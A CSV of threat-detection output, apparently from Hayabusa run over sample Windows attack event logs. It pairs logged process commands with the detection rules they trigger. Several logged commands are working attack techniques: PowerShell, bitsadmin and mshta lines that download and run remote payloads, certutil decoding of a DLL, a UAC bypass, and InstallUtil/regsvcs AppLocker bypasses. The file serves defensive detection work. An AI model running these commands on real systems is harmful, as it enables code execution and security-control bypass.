2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 0000022557280720  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders  :  Command: ""C:\Windows \System32\winSAT.exe"" formal  :  Path: C:\Windows \System32\winSAT.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",  :  Path: C:\Windows\System32\control.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",  :  Path: C:\Windows\SysWOW64\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt  :  Path: C:\Windows\SysWOW64\wscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c certutil -f -decode fi.b64 AllTheThings.dll   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil  -f -decode fi.b64 AllTheThings.dll   :  Path: C:\Windows\System32\certutil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe  /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""  :  Path: C:\Windows\System32\bitsadmin.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  /logfile= /LogToConsole=false /U AllTheThings.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe  javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();  :  Path: C:\Windows\System32\mshta.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: mshta.exe  javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell  -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell  -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe  AllTheThings.dll  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
